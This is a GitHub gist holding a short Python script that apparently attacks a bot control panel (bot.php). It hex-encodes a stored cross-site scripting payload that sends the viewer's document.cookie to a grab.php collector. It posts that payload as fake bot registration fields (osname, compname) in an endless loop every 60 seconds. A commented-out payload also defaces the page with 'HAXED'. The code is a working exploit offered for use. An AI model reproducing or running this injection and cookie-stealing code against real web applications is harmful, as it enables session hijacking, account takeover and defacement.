Skip to content

Instantly share code, notes, and snippets.

@Xyl2k
Created September 14, 2014 09:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Xyl2k/c23171909dc3bec49a95 to your computer and use it in GitHub Desktop.
Save Xyl2k/c23171909dc3bec49a95 to your computer and use it in GitHub Desktop.
import requests
import time
def StrToHex(string):
hex_str=''
for char in string:
int_char = ord(char)
hex_num = hex(int_char).lstrip("0x")
hex_str+=hex_num
return hex_str
ConnectUrl = 'http://localhost/something/bot.php'
UserString = 'rome0321'
HtmlInject = StrToHex("<script>document.location=\"http://localhost/grab.php?\"+document.cookie</script>")
count = 0
PostData = {'mode':'1', 'uid':'ASS', 'osname':HtmlInject, 'compname':HtmlInject}
UserAgent = {'User-agent': UserString}
while True:
count = count + 1
print "The fire day - ", count
requests.post(ConnectUrl, data=PostData, headers=UserAgent)
time.sleep(60)
#<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HAXED</h1></div>";</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment